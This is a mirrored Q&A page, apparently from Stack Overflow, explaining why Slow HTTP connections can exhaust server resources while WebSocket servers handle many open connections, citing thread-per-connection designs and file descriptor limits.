简体   繁体   中英

Slow HTTP vs Web Sockets - Resource utilization

If a bunch of "Slow HTTP" connection to a server can consume so much resources so as to cause a denial of service, why wouldn't a bunch of web sockets to a server cause the same problem?

The accepted answer to a different SO question says that it is almost free to maintain a idle connection.

If it costs nothing to maintain an open TCP connection, why does a "Slow HTTP" cause denial of service?

A WebSocket and a "slow" HTTP connection both use an open connection. The difference is in expectations of the server design.

Typical HTTP servers do not need to handle a large number of open connections and are designed around the assumption that the number of open connections is small. If the server does not protect against slow clients, then an attacker can force a server designed around this assumption to hit a resource limit.

Here are a couple of examples showing how the different expectations can impact the design:

  • If you only have a few HTTP requests in flight at a time, then it's OK to use a thread per connection. This is not a good design for a WebSocket server.

  • The default file descriptor limits are often adequate for typical HTTP scenarios, but not for a large numbers of connections.

It is possible to design an HTTP server to handle a large number of open connections and several servers do so out of the box.

The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address.Any question please contact:yoyou2525@163.com.

 
粤ICP备18138465号  © 2020-2024 STACKOOM.COM